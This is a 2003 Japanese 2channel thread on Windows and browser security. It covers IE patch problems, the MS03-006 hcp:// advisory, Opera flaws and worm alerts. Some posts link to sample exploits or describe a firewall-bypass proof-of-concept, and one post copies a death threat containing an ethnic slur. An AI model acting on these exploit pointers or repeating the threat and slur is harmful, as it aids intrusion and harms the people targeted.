Outlook Expressを使わなければ
IEのパッチのせいで不具合が出ることもなくなるってw
111名無しさん@お腹いっぱい。:03/02/20 22:25 ID:HkhGqO5S
ナンデダロ~ォ乂(゚◇゚ ))((゚乂゚))(( ゚◇゚)乂ナンデダロ~ォ

ってゆーか、早く直し方を教えて下さいm(_ _)m
112名無しさん@お腹いっぱい。:03/02/20 23:21 ID:???
>>107
某所で関連していると思われる不具合が起きています。
ソースの場所があれなので内容だけコピペします。

動画が再生できない。

◆原因
・まず、今回の「動画がみれない」=「パスワードを受付けない」という根本的な原因は、
2003年2月6日のマイクロソフト社インターネットエクスプローラー(以下IE)の
セキュリティーホール修正パッチ「IE用の累積的な修正プログラム (810847) (MS03-004)」が
完全なものでなかったというところにあります。

・動画が見れないという現象が起き始めたのは、このパッチを自動もしくは手動でインストールされた
2月6日〜11日に集中しておりました。これは当サイトの動画だけでなくアウトルックエクスプレスや
ワードパッドなどその他基本認証が必要とされるものに関して同様に発生していたようです。

・発生初期の段階では、ほぼ同時期にウィンドウズメディアプレーヤー(以下WMP)バージョン9が
リリースされ、これが原因とのウワサもあったのでバージョンを戻していただくという処置をお願いいたしました。
ここでプログラムの「システムの復元」によりバージョンを戻された方は、IEのパッチ(810847)も
削除されるので見れたのですが、WMPのバージョンだけを戻された方は見れないという状態でした。
本当にすみません。

113名無しさん@お腹いっぱい。:03/02/20 23:24 ID:???
◆対処法
・以下の方法がありますが、ご使用のパソコンの状態により対処法が変わってきますのでご注意ください。
また、WindowsXPで「システムの復元」を行う場合などは復元ポイントまで戻ってしまうため、
プログラム等の追加をしている場合には再度追加していただく作業が必要となります。
WMPバージョン7でも見れないという方は、このIE用の「810847」のパッチがあやしいので試してみてください。

◆2月13日発表の修正パッチをあてる。
◆IEの設定変更変更をする。
◆修正パッチ「810847」を削除する。

以下3つの対処法は「810847」のパッチがインストールされている状態が前提となります。


114名無しさん@お腹いっぱい。:03/02/20 23:24 ID:???
◆2月13日発表の修正パッチをあてる。←ネットで見つけた対処法
Internet Explorer 6 SP1を適応されている方は「February 2003, Update for Internet Explorer 6 SP1 (813951)」へ行って頂き、
英語バージョンですが、一応言語で「Japanese」を選択して「Go」をクリック。
そこに「813951」のファイルがありますので、ダウンロードしてインストールしてください。
これが一番簡単!動作確認済みです。

◆IEの設定変更変更をする。←マイクロソフトサポートからの直接回答
・IEの「ツール」→「インターネットオプション」→「全般」の中程にある「インターネット一時ファイル」部分の「設定」をクリックしてください。

・「保存しているページの新しいバージョンの確認」という項目で「自動的に確認する」にチェックを入れて「OK」をクリック。

・すでに「自動的に確認する」にチェックが入っていた場合は、「ページを表示するごとに確認する」などに一度設定を変更して、
再度「自動的に確認する」にチェックをいれて「OK」をクリックしてみてください。

ほとんどの場合はこの方法で回避できるそうです。 サポートの人はなぜか自信ありげでした。
しかーし、わたくしのノートパソコンはダメでした・・・(ToT)

サポートの人:「えっ、おかしいですね〜。では810847のパッチを削除してみましょう」
ということで↓の方法へ。

◆修正パッチ「810847」を削除する。←マイクロソフトサポートからの直接回答
上記2つの方法で見れなかったという方は「810847」のパッチを削除してみてください。
「プログラムの追加と削除」で削除するか、または「システムの復元」で「810847」インストール前の復元ポイントまで戻ってください。

この方法でわたくしのノートパソコンのWMP8および再度インストールしたWMP9でも問題なく見れるようになったので、
サポートの人も「やはりこのパッチが原因ですね。この問題は継続して調査しておりますので、
原因がわかり次第新たなパッチを公開すると思います。それまでこの状態でお願いします。」とのこと。

この問題が解決するまでしばらく様子を見たいという方はこの方法がいいかも。
115名無しさん@お腹いっぱい。:03/02/21 03:11 ID:VL1tqGag
Outlook Expresでメールの受信が2日ほど前から出来ません。
認証しようとしても、
サーバーと通信しようとして、タイムアウトが発生しました。(以下略
と出るんですが…

107とは違うと思うんですが、どうしたらいいでしょうか?
116115:03/02/21 05:31 ID:???
ツール→アカウント→既定のアカウントを削除→
アカウントを最初から作り直す、で直りました。

あちこちで聞いてスミマセンでしたm(_ _)m。

(´-`).。oO(パスワード等を書いた紙を探すのが大変だったなぁ。)
117名無しさん@お腹いっぱい。:03/02/21 05:52 ID:???
この数日で色々なトラブルが出てるなぁ(;´Д`)
報告して下さった方お疲れ様です(スレに関係なくてスマンコ)
118名無しさん@お腹いっぱい。:03/02/21 08:52 ID:TRRjq54H
ノートンアンチウィルスのライブアップデートが出来ないんです。。。
更新リストが壊れているって出てしまうんです。
それって何かのウイルスに感染してたりしますか?
119名無しさん@お腹いっぱい。:03/02/21 10:17 ID:???
>>118
更新リストは時々フツーに壊れることがあるので、
ノートンアンチウィルスを再インストールするのがいいかな。
それか↓の件かも。
http://service4.symantec.com/SUPPORT/INTER/navjapanesekb.nsf/4aefaadc9d7b2aef8825694c005b6a08/34431c2295058a6485256b03005a9ed9?OpenDocument
120むむむ ◆MUMUMUkopk :03/02/21 12:37 ID:???
>>118
>>94 かと。
121aaa:03/02/21 13:57 ID:HUigAOu9
キタ━━━━━━(゚∀゚)━━━━━━ !!!!!  殺人予告  IN ニュー速 祭り?
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
関西大学にいるRENKの李ってチョンへ
http://live2.2ch.net/test/read.cgi/news/1045795571/1
1 名前: ははははははははは 投稿日: 03/02/21 11:46 ID:CBQUSiFX
1週間以内に殺すからヨロシク
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
>名前:ひろゆき ◆3SHRUNYAXA @どうやら管理人 ★[] 投稿日:03/02/21 13:53 ID:???

>大学名と個人名を指定しての殺人予告は警察に直接連絡する方針なのでよろしくです。。
122窓板住人 ◆winDOwS0aE :03/02/21 14:25 ID:lxEdvCa0
雑多なセキュリティ話題を。

・SlammerはTrustworthy Computing提唱後の最大の事件〜Microsoft社内の感染例を紹介
マイクロソフト株式会社は20日、定例のプレスセミナーにおいて、
先月、韓国などで大きな被害をおよぼしたワーム「Slammer」に
ついての総括的な報告を行なった、そうです。危機管理対処の面においての
MSの対応が具体的に掲載されてますので参考まで。
http://pc.watch.impress.co.jp/docs/2003/0220/ms2.htm

・Microsoft Windows 2000 セキュリティ構成ガイド
Microsoft Windows 2000 セキュリティ構成ガイドにようこそ。
このドキュメントでは、Windows 2000 共通基準セキュリティ ターゲット (ST)
に従って、Windows 2000 を安全にインストールして構成する方法を紹介します。
http://www.microsoft.com/japan/technet/security/issues/w2kccscg/default.asp

・Windows 2000 評価構成 ユーザーズ ガイド
Microsoft Windows 2000 評価構成 ユーザーズ ガイドへようこそ。
Windows 2000 共通基準セキュリティ ターゲット (以降、Windows 2000 ST とします)
では、インフォメーション テクノロジ セキュリティ評価の共通基準 (CC) から抜粋した
一連のセキュリティ要件について解説します。Windows 2000 製品は Windows 2000 ST
に基づいて評価され、ST 要件を満たしていることが認められています。
この文書は、Windows 2000 共通基準セキュリティ ターゲット (ST) に記載されている
要件に従い、製品を安全に使用するために必要な指針を Windows 2000 ユーザーに
提供します。この文書は、Windows 2000 の管理者でないユーザー (特権を持たない
ユーザーなど) を主な読者として想定しています。
http://www.microsoft.com/japan/technet/security/issues/w2kccug/default.asp
123名無しさん@お腹いっぱい。:03/02/22 01:04 ID:???
>>90
累積的な修正ってなってるけど
329170もあたっちゃうの?
124窓板住人 ◆winDOwS0aE :03/02/22 03:42 ID:79XdlWPi
>>123 329170はWindowsに対する更新で、>>90はIEに対する更新だから当たりませんよ。
125名無しさん@お腹いっぱい。:03/02/22 12:05 ID:???
ありがとん
126名無しさん@お腹いっぱい。:03/02/22 18:42 ID:???
q810847をいれてもMSNや他のWebメールにはつながったのですが、
q813951をいれたらMSNじゃないWebメールにつながらなくなりました。
反応がなくてタイムアウトでもう一度IDとpassを要求されるので、
もう一度入力するのですが、やっぱり反応が無くてつながりません。
ネットの環境は変えてないのでパッチが問題なのですが、同じような症状になった方いますか?
127窓板住人 ◆winDOwS0aE :03/02/22 18:56 ID:79XdlWPi
>>126 単にネットワークに問題があるだけのような気もしますが・・・
128126:03/02/22 19:02 ID:???
パッチをいれる前は普通につながっていて、それから設定は変えていません。
なので設定の問題ではないと思います。
129窓板住人 ◆winDOwS0aE :03/02/22 20:33 ID:79XdlWPi
>>128 具体的にサイトを明示してくれないと何とも言えないと思います
あと、俺が言っているのは、設定ではなくて、あなたのお使いのプロバイダの
上位回線のトラブルではないかということです
130 ◆102GUOkBIQ :03/02/22 20:46 ID:5vgqVOOk
【管理人ひろゆき登場!?】
2chの管理人、ひろゆきがJBBSに登場!?
そしていきなりスレを立てた!?
判明した途端、どんどん記念カキコで膨れて逝くスレ。
現れた掲示板はここ↓
http://jbbs.shitaraba.com/computer/bbs/read.cgi?BBS=3011&KEY=1030724122&START=1&END=1
131126:03/02/22 20:50 ID:???
失礼しました。
ttp://xbox.jp/club/mail.html
ここです。
132窓板住人 ◆winDOwS0aE :03/02/22 22:35 ID:79XdlWPi
>>131 あー、できないねぇ・・・
でもこれはXbox.jpが糞なだけのような気がするけど・・・
他のサイトで類似事例ないんだよね?
とりあえずMSサポートにメールしたから様子見てよ。

と言おうとしたら、そのフォームも送信完了されないねぇ・・・
どうせフリーサービスだとわりきって別なのを探してみたら?
133126:03/02/22 23:14 ID:???
レスありがとうございます。
もうすこし様子を見てだめだったら別のを探してみます。
お世話になりました。
134むむむ ◆MUMUMUkopk :03/02/23 01:49 ID:???
>>107 の対策版が出ました。 (Windows Update に掲載)

813951 : Internet Explorer 6 SP1 の修正プログラム
ダウンロード サイズ: 343 KB, < 1 分
この修正プログラムによって、Internet Explorer の修正プログラム 810847 が
原因で発生する Internet Explorer の認証の問題が修正されます。今すぐ
ダウンロードして、継続的な認証要求が発生しないようにしてください。
インストール後には、コンピュータの再起動が必要になる場合があります。
インストールすると、削除することはできません。
135窓板住人 ◆winDOwS0aE :03/02/23 03:00 ID:???
>>134 >>107の対策とは違うと思いますよ・・・
813951は >>90 の件ですから。
136むむむ ◆MUMUMUkopk :03/02/23 04:20 ID:???
>>135
おお、MS03-004 だったので早とちりでしたかもです。
# 早く寝ないと、、、。
137118:03/02/23 09:49 ID:???
>>119さん120さん
ありがとうございます〜
なんとか復旧?できました!!
ほんとにありがとう(^o^)
138ちんたらもさお:03/02/24 14:12 ID:Nq7IQV/R
ここまで読んで、アプデイト完了
139test:03/02/25 12:49 ID:???
140むむむ ◆MUMUMUkopk :03/02/25 13:07 ID:5/iSqn5i
QuickTime/Darwin Streaming Administration Server - Multiple Vulnerabilities
http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0094.html
141名無しさん@お腹いっぱい:03/02/25 13:37 ID:???
142むむむ ◆MUMUMUkopk :03/02/26 11:02 ID:K+B8CWkq
◆【今週のSecurity Check】
  IE/Netscape/Operaユーザーは必見,Webブラウザのセキュリティ総点検

 今回の記事では,Internet Explorer(IE),NetscapeおよびOperaにおける最新
のセキュリティ対策をまとめた。記事を参考にぜひ総点検していただきたい。また
一種類のブラウザだけを使い続けるのはお勧めできない。安全なブラウザは存在し
ない。複数のブラウザを使い分けることで,リスクを軽減したい。

続き(全文)は,
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20030225/1/
でお読みいただけます。
143test:03/02/27 03:06 ID:Nz1UmdpN
Lovgate.Dの亜種が発見される(2003.2.26)
https://www.netsecurity.ne.jp/article/2/8859.html
144むむむ ◆MUMUMUkopk :03/02/27 06:38 ID:Yylq3OKn
■Opera7.02以前のバージョンにCSS脆弱性(サンプルコード公開)

対処法: 7.02へのアップグレード

http://archives.neohapsis.com/archives/vulnwatch/2003-q1/0096.html
http://www.secunia.com/secunia_research/2003-1/
http://www.secunia.com/secunia_research/2003-1/exploit/ (sample exploit)
145むむむ ◆MUMUMUkopk :03/02/27 08:51 ID:Yylq3OKn
■Windows Meの「ヘルプとサポート」にバッファオーバーフローの脆弱性(MS03-006)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-006ov.asp

MS03-006 に関する情報
「MS03-006: Windows Me の 「ヘルプとサポート」 の問題によりコードが
実行される (812709)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この問題は、URL Handler に含まれる未チェックのバッファにより、不正な
プログラムが実行される可能性がある問題です。最悪の場合、悪意のある
ユーザーにお客様のコンピュータ上で任意のプログラムが実行される可能性が
あります。
146むむむ ◆MUMUMUkopk :03/02/27 08:52 ID:Yylq3OKn
>>145 続き

対象となる製品
==============
・Microsoft Windows Millennium Edition (Windows Me)

修正プログラム
==============
・Microsoft Windows Millennium Edition
http://windowsupdate.microsoft.com

修正プログラムは、 Windows Update により提供されております。
修正プログラムのダウンロードは、Windows Update カタログより、
"Windows Millennium Edition" で検索し、
"812709 : セキュリティ問題の修正プログラム (Windows Me) -
(投稿した日付: February 25, 2003) " をダウンロードしてください。

修正プログラムのダウンロード、または、インストール方法については
次のサイトを参照ください。
147名無しさん@お腹いっぱい。:03/02/27 12:20 ID:vbm6Itkk
>145.146

Windows updateでインストール何度やってもされないから自分で入れたいんすけど、
DL先が見つかりません。。。。どこ??
148oe:03/02/27 13:57 ID:???
マカフィーとかだけでは駄目なの?
149名無しさん@お腹いっぱい。:03/02/27 14:00 ID:RwHJVwVH
分かりにくい!分かりにくすぎ!マイクソソフトめ!
150窓板住人 ◆winDOwS0aE :03/02/27 14:18 ID:???
>>147 "Windows Update"ではなく"Windows Updateカタログ"と思われます
windowsupdate.microsoft.comへアクセスした後、Windows Updateカタログへのリンクを
クリックして、検索すれば見つかるかもしれません(私は2000なので)

>>148 スルーしてしまう可能性は高いと思われます
151名無しさん@お腹いっぱい。:03/02/27 14:46 ID:???
つまり、hcp://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx・・・とか言う
くそ長いURLをクリック若しくは転送などで踏ませる事によってクラッシュするって事かな?
だとするとかなり凶悪なんだけども。
152窓板住人 ◆winDOwS0aE :03/02/27 14:48 ID:???
>>151 みたいね

>>150 くわしいやりかた
1. http://windowsupdate.microsoft.com にアクセスします。
2. Internet Explorer左側ペインに「Windows Update カタログ」と言うのがあるのでクリックします
3. 「Microsoft Windows オペレーティング システムの更新を探します」をクリックします
4. 「Windows Millenium Edition」 「日本語版」を選択し、検索オプションの詳細設定で
投稿した日付を「先週」、キーワードを「812709」、更新の種類「重要な更新と Service Pack」に
のみチェックを入れ、検索ボタンを押します。
5. 「検索結果は1件ありました」と表示されます。「重要な更新と Service Pack (1)」カテゴリを
クリックすると、「812709 : セキュリティ問題の修正プログラム (Windows Me) - (投稿した日付: February 25, 2003)」
という項目が表示されます。「追加」ボタンを押し、「ダウンロード バスケットに移動します」をクリックします。
6.ダウンロード先を指定し、「今すぐダウンロードする」を押してダウンロードしてください。
7.ダウンロードが終わったら、その更新プログラムを実行してください。
153名無しさん@お腹いっぱい。:03/02/27 14:50 ID:???
http://headlines.yahoo.co.jp/hl?a=20030227-00000008-zdn-sci

このセキュリティホールについて、詳しい情報ください
154窓板住人 ◆winDOwS0aE :03/02/27 14:57 ID:???
>>153 >>145 で足りないなら補足します。

----------------------------------------------------------------
最新情報は次のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms03-006.asp
----------------------------------------------------------------
Windows Me の 「ヘルプとサポート」 の問題によりコードが実行される
(812709) (MS03-006)

登録日 : 2003/2/27 更新日 : 2003/2/27
概要 : このセキュリティ情報の対象となるユーザー :
    Microsoft(R) Windows(R) Me をご使用のお客様
脆弱性の影響 : 攻撃者の任意のコードが実行される
最大深刻度 : 緊急
推奨する対応策 : お客様は、直ちにこの修正プログラムをインストールしてください。
影響を受けるソフトウェア :Microsoft Windows Me
155窓板住人 ◆winDOwS0aE :03/02/27 14:58 ID:???
問題 : 技術的な説明 :
「ヘルプとサポート」 では様々なトピックに関してユーザーがサポートを
受けることができる機能が集まっています。たとえば、製品に関する文書、
ハードウェア互換性を確認するためのサポート、Windows Update へのリンク、
マイクロソフトからのオンライン ヘルプおよびそのほかのサポートが提供
されています。ユーザーおよびプログラムは、URL リンクの最初に "http://"
ではなく、"hcp://" を入力することによって、「ヘルプとサポート」 への URL
リンクを実行することができます。
"hcp://" の URL Handler に未チェックのバッファが含まれるため、Windows Me
バージョンの 「ヘルプとサポート」 にセキュリティ上の脆弱性が存在します。
攻撃者がこの脆弱性を悪用し、URL を作成し、ユーザーがそれをクリックすると、
ローカル コンピュータのセキュリティ コンテキストで攻撃者の任意のコードが
実行される可能性があります。攻撃者はそのような URL を Web サイト上の Web
ページにホストするか、または電子メールで直接ユーザーに送信する可能性が
あります。Web を悪用した場合のシナリオでは、ユーザーが Web サイトに
ホストされた URL をクリックした場合、攻撃者はローカル マシン上に既に存在
するファイルを読み取るか、または起動する可能性があります。電子メールを
悪用した攻撃の場合、Outlook Express 6 または Outlook 2002 を既定の構成で
使用するか、または Outlook 電子メール セキュリティ アップデートを
インストールした Outlook 98 または 2000 を使用している場合、自動化された
攻撃を行うことはできず、この脆弱性の悪用には、電子メールで送信された URL
をユーザーがクリックすることが必要条件となります。しかし
Outlook Express 6 または Outlook 2002 を既定の構成で、またはOutlook
電子メール セキュリティ アップデートをインストールした Outlook 98 または
2000 を使用していない場合、ユーザーが電子メールに含まれた URL をクリック
しなくても攻撃者は自動的に攻撃を行うことができます。
156窓板住人 ◆winDOwS0aE :03/02/27 14:58 ID:???
問題を緩和する要素 : (略)
深刻度 : Windows Me 緊急
上記の評価はこの脆弱性の影響を受けるシステムの種類、システムの典型的な
展開形式およびこの脆弱性がシステムに及ぼす影響に基づいています。
脆弱性識別番号 : CAN-2003-0009
テストしたバージョン :
Windows Me および Windows XP
それ以前のバージョンの Windows には問題のコードは含まれず、影響はありません。

修正プログラム : (この修正プログラムは、 Windows Update のみにより提供されております。)
812709 : セキュリティ問題の修正プログラム (Windows Me)
http://windowsupdate.microsoft.com/
Windows Update の利用方法については以下のサイトを参照してください。
・Windows Update 利用の手順
http://www.microsoft.com/japan/security/square/guard/a04g11.asp
修正プログラムに関する追加情報 :
対象プラットフォーム : Windows Me
再起動の必要性 : あり
修正プログラムのアンインストール : 不可
修正プログラムに含まれる過去の修正 : なし
修正プログラムが正しくインストールされたかどうか確認する方法 : (略)
各ファイルを確認するためには、サポート技術情報 812709 のファイル欄を
参照して下さい。日本語版修正プログラムの情報は、現在準備中です。
警告 : なし
詳細情報 :
・US マイクロソフトセキュリティ情報(MS03-006)
http://www.microsoft.com/technet/security/bulletin/ms03-006.asp
謝辞 :(略)
更新履歴 : ・2003/2/27: このセキュリティ情報ページを公開しました。
157窓板住人 ◆winDOwS0aE :03/02/27 15:03 ID:???
>>152 で「Windows Update カタログ」のリンクが見つからない場合は
「その他のオプション - Windows Updateのカスタマイズ」と言う項目があれば
クリックして、「Windows Update カタログへのリンクを関連項目の下に表示する」の
チェックを入れてください。

158名無しさん@お腹いっぱい。:03/02/27 15:43 ID:/BHaFfMP
ウインドウズMeは欠陥商品だとの事ですので注意してください。
http://www.asahi.com/national/update/0227/019.html
159147:03/02/27 15:44 ID:vbm6Itkk
>152.157

とっても親切なご説明ありがとうございます。
手順に従って進んでいったのですが、DL出来ません。
DL先の参照を変えても駄目でした。
もう手詰まりですかねぇ。。。
160窓板住人:03/02/27 16:16 ID:OHuPyvLT
>>159 どうDL出来ないのか言ってくれないとどうしようもないんですが・・・
161password recovery tool:03/02/27 17:40 ID:???
http://www.st.ryukoku.ac.jp/~kjm/security/memo/より
カインとアベル (Cain & Abel) という Windows NT/2000/XP 用の
"password recovery tool" があるそうで。
http://www.oxid.it/cain.html
ノートン大先生の分析結果
ファイル名:cain20.exe
結果: このファイルは次のウィルスに感染しています:
Virus.Dropper デベロッパーノート
cain20.exe is non-repairable threat. It is detected by NAV
with the latest definition, which is available from LiveUpdate
or http://securityresponse.symantec.com.
Please delete this file and replace it if neccessary.

現在認証されているウィルス定義を使えば、このウィルスを検出することができ、
感染したファイルを見て、必要な作業を判断します。Norton AntiVirusから
LiveUpdate]ボタンをクリックしてウィルス定義を更新してください。
162147:03/02/27 18:44 ID:vbm6Itkk
>160

DL先を参照で設定してDLを開始し、DLゲージ?が満タンに
なるんですが、結果表示の欄に「DLできませんでした」と表示されるんです。
163窓板住人:03/02/27 18:47 ID:???
>>162 インターネット一時ファイルを削除して再起動してみる
164名無しさん@お腹いっぱい。:03/02/27 18:59 ID:???
Windows UpdateでMS製ソフト以外の情報も収集 2月27日(木)18時47分
http://headlines.yahoo.co.jp/hl?a=20030227-00000013-vgb-sci
165147:03/02/27 19:23 ID:???
>163

一時ファイル削除後、再起動してからDLしたところ、無事にDLできました。
アップデートも問題なく出来ました。

質問に親切に答えていただいた方々に厚くお礼申しあげます。
どうもありがとうございました。(人-)謝謝(-人)謝謝
166名無しさん@お腹いっぱい。:03/02/27 22:12 ID:s27j9P+O
マイクロソフト、WindowsUpdateでユーザー情報を不正に収集
http://headlines.yahoo.co.jp/hl?a=20030227-00000013-vgb-sci
Windows Updateこそが最悪のセキュリティ危機!
167名無しさん@お腹いっぱい。:03/02/28 00:12 ID:???
>166
気にする程ではないよ
168窓板住人 ◆winDOwS0aE :03/02/28 00:34 ID:???
あの、このスレに書き込むみなさん、数レスくらいはさかのぼってから書き込みませんか?(^^;;
169名無しさん@お腹いっぱい。:03/02/28 00:39 ID:???
厨しかいないので無理です
170名無しさん@お腹いっぱい。:03/02/28 09:21 ID:qa1UjcTu
日テレジェニック卒業制作ドラマ「真夜中の少女MAYA」「撮影中のMAYA」
 DVD、ビデオ発売記念イベント
 3月9日(日)1回目13:00 2回目15:30
 秋葉原ラオックスアソビットシティ
集え!2ちゃんねらー!生藤本綾に会える!
171名無しさん@お腹いっぱい。:03/02/28 09:36 ID:YdSC4D1G
Windows UpdateでMS製ソフト以外の情報も収集

マイクロソフトのWindows Updateサイトにおいて、
PCから同サイトのサーバに送信される情報の中に
MS製ソフト以外の情報が含まれていることが確認された。
Windows Updateでは、OSやIEなどのバージョン情報が
サーバに送られ、該当するアップデータが提供される。
このときに数KBのデータが送信されるが、
このデータを解析したところ、上記の問題が確認された。

https://www.netsecurity.ne.jp/article/2/8875.html
172窓板住人 ◆winDOwS0aE :03/02/28 11:57 ID:???
173test:03/02/28 14:13 ID:v3JXfwNo
Bypassing Personal Firewalls
http://www.st.ryukoku.ac.jp/~kjm/security/memo/

-----------------
personal firewall を乗りこえるプログラムソース (バイナリ)。以下の personal firewall で有効だという:

ZoneAlarm Pro 3.5 (all settings at highest)
Zero-Knowledge Freedom Firewall
Look'n'Stop 2.04
Sygate Personal Firewall PRO (highest settings)
Norton Personal Firewall 2003 (highest settings)
174窓板住人 ◆winDOwS0aE :03/03/02 03:00 ID:DFvbAHHq
セキュリティネタではないのですが、ちとしゃれになってないし、
あなたのコンピュータの物理的セキュリティということで無理矢理関連づけて。

マイクロソフト サポート技術情報 - 331958
スタンバイまたは休止状態に入るとハード ディスクが破損する
http://support.microsoft.com/default.aspx?scid=kb;[LN];331958

Windows XP Home/Proで48bitLBAを有効にした場合、だそうです。
137GB以上のHDDをお持ちの方、十分ご注意下さい。
175名無しさん@お腹いっぱい。:03/03/02 17:12 ID:???
>>174
これって1月には公表されてたしWUにも出てたような気がするのにどうして最近になって
急に騒いでんのかね?
176名無しさん@お腹いっぱい。:03/03/02 18:41 ID:???
こっそりリリースして人柱によるテストが済んだから、
M$も本格的に情報を流しだしたが正解では。
177窓板住人 ◆winDOwS0aE :03/03/02 22:28 ID:???
>>175 WUにありました?それは失礼・・・
178 Bypassing Personal Firewalls:03/03/02 23:18 ID:???
>>173
あなたが送られたファイルに関する情報や現在の状態をお知らせします。
thermite.exe is a proof-of-concept for an exploit used to demonstrate
how to bypass the Firewalls. It is not viral but we suggest to delete it.

This message was generated by Symantec Security Response Automation
179むむむ ◆MUMUMUkopk :03/03/04 19:42 ID:Mu6N/oSi
例の sendmail のセキュリティホールは、Windows NT 版にも影響ある模様。
http://www.sendmail.com/security/index.shtml
180名無しさん@お腹いっぱい。:03/03/04 20:47 ID:BpPHvyj5
すごい。そういう情報はどのようにして??
181むむむ ◆MUMUMUkopk :03/03/04 20:53 ID:Mu6N/oSi
>>179
日本の代理店にも情報上がりました。
http://www.ant.co.jp/Products/SAMS_Index.htm

>>180
セキュリティ関係はMLを10種類ぐらいと定期的にチェックするWebがいくつか。
でも、昔に比べるとチェックしてるMLは半分以下。
英語のページとかのチェックも減ってる。
最近、時間とれなくてややへたれ気味かも。
182むむむ ◆MUMUMUkopk :03/03/06 02:23 ID:???
■Macromedia Flash Playerに「critical」な脆弱性、パッチの適用を

 Macromediaは3日、「Flash Player」用累積セキュリティパッチを公開した。
同社では、この問題を「critical update」とし、速やかに最新版「6,0,79,0」への更新を
求めている。

 この累積パッチを適用することで、バッファオーバーフローやサンドボックスの
脆弱性を利用して、悪意のあるコードが実行されることを防げるとしている。
(以上、2003年3月6日のInternet Watchより一部引用―全文は引用元を参照)

引用元: http://internet.watch.impress.co.jp/www/article/2003/0305/flash6.htm
Macromediaのアナウンス: http://www.macromedia.com/devnet/security/security_zone/mpsb03-03.html
183むむむ ◆MUMUMUkopk :03/03/06 16:59 ID:???
■ソニー製ICカード用のパソコン・ソフトにセキュリティ・ホール

 ソニーは2003年3月3日,非接触型ICカード・リーダー「PaSoRi(パソリ)」をパソコ
ンで使用するためのソフトウエア「FeliCa Offline Viewer」に,第三者によりパソ
コンを操作されてしまう可能性のあるセキュリティ・ホールがあると発表した。同時
に,同社のホームページで修正プログラムの提供を開始した。
(以上、2003年3月6日のIT Proより一部引用―全文は引用元を参照)

引用元: http://itpro.nikkeibp.co.jp/free/NOS/NEWS/20030305/1/
184test:03/03/06 21:41 ID:sLsFS1oF
警察庁セキュリティポータルサイト
インターネット利用者のセキュリティ意識の高揚、
ひいてはハイテク犯罪・サイバーテロの未然防止及び被害の拡大防止に資するため、
今般、「警察庁セキュリティポータルサイト」を開設しましたのでお知らせします。

http://www.cyberpolice.go.jp/
185test:03/03/06 21:42 ID:sLsFS1oF
186名無しさん@お腹いっぱい。:03/03/07 00:35 ID:wMn3Oa2V
XPを使用しています。
最近(2月27日、3月1日、3月3日、3月6日)ネットにつなげると
毎回アップデートの自動更新のお知らせが出ます。
しかも全部「セキュリティ問題の修正プログラム 2002年2月13日
(MSXML 2.6)と(MSXML 3.0)」です。
履歴を見ると成功してるんですけど、何度もお知らせが出るので
毎回インストールしてます。
皆さんもそうですか?
187名無しさん@お腹いっぱい。:03/03/07 00:56 ID:???
>186
そういう人けっこういるみたいだね
↓の失敗スレ参照

windows update失敗したらあげるスレ 3
http://pc2.2ch.net/test/read.cgi/win/1040217939/
188名無しさん@お腹いっぱい。:03/03/07 23:11 ID:???
189むむむ ◆MUMUMUkopk :03/03/08 01:53 ID:???
>>188

>>182 にて。
190186:03/03/09 16:57 ID:???
>>187
スレ紹介ありがとうございます。あとで読んでみます。

インストールの履歴を見てもすべて「成功」となってるので
失敗はしてないと思うのですが。

先ほども自動更新のポップアップが出たので、見てみると
また同じ修正プログラムでした。とりあえずインストールしておきました。
自動更新の設定をはずしてみようかと思います。
191窓板住人 ◆winDOwS0aE :03/03/09 23:30 ID:???
>>190 成功になってるから違うとは思うけど、ちょっとこれを試してみたらどうよ?
マイクロソフト サポート技術情報 - 436059
[MSXML] サポート技術情報 318202 およびセキュリティ情報 MS02-008 で提供
されている修正モジュールを適用できない場合がある
http://support.microsoft.com/default.aspx?scid=kb;ja;436059
192186=190:03/03/10 01:57 ID:???
>>191
アドバイスありがとうございます。
先ほど187さんに紹介されたスレを読んでみました。
マイクロソフトのほうでも調査中とのことなので
しばらく様子を見てみます。
http://www.microsoft.com/japan/security/sicinfo.asp
193窓板住人 ◆winDOwS0aE :03/03/10 06:52 ID:???
>>192 あらま。このページははじめてみました。情報Thanksです。
つーか、KnowledgeBaseにもSecurity情報にも書いてなかったのでやむなく
ああいうレスしたんですが・・・MSよ、こういう情報はSecurity情報に書いて欲しいモノです(^^;
194窓板住人 ◆winDOwS0aE :03/03/10 16:15 ID:???
WORM_DELODER.A と言うインターネットワームが2003年3月9日午後9時現在、
中国を中心に流行中のようです。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_DELODER.A

Windows2000/XPのみ使用可能であるPort445/tcp ダイレクトホスティングSMBサービス
を利用してリモートログインを試行します。
Windows2000/XPユーザはインターネット接続用ネットワークについて、
ポート137-139の閉鎖だけではなく445の閉鎖も積極的に検討してください。
http://www.atmarkit.co.jp/fwin2k/win2ktips/088directhostedsmb/088directhostedsmb.html

なお、感染したマシンに勝手にWinVNCも導入されていたという情報がWindows板で流れています。
WinVNCはフリーのデスクトップ遠隔操作ソフトウェアです。
因果関係は不明ですが、それぞれご注意下さい。
195むむむ ◆MUMUMUkopk :03/03/10 17:26 ID:???
■Opera 7/6に脆弱性ダウンロード時の長いファイル名で起こる
バッファオーバーフローによる脆弱性

・概要
Windows版 Opera には深刻なセキュリティーホールが存在します。
Opera はファイルをダウンロードする際にファイル名の長さをチェックしていません。
そのため長いファイル名を持つファイルをダウンロードする時、
「ダウンロードダイアログ」を表示しようとするとスタック上で
バッファオーバーフローが発生します。
これによりスタック内に保存されているRETアドレスを上書きすることで、
バッファに書き込んだ任意のコードを実行することが可能です。

・テストしたバージョン
Opera (Windows用) :
Opera7.02 build 2668
Opera7.02 bork build 2656b
Opera7.01 build 2651
Opera6.05 build 1140
各英語版+日本語版
(以上、2003年3月10日の下記Web Pageより一部引用―全文は引用元を参照)

引用元: http://opera.rainyblue.org/adv/opera02-dlfnbof.php
196窓板住人 ◆winDOwS0aE :03/03/10 19:02 ID:???
Unix, Windows, MacOS X and OS/2などで利用可能なアプリケーション層ゲートウェイ&サーバ
として人気の高いDelegateに非常に多くのUser-Agentが記述されているrobots.txtを
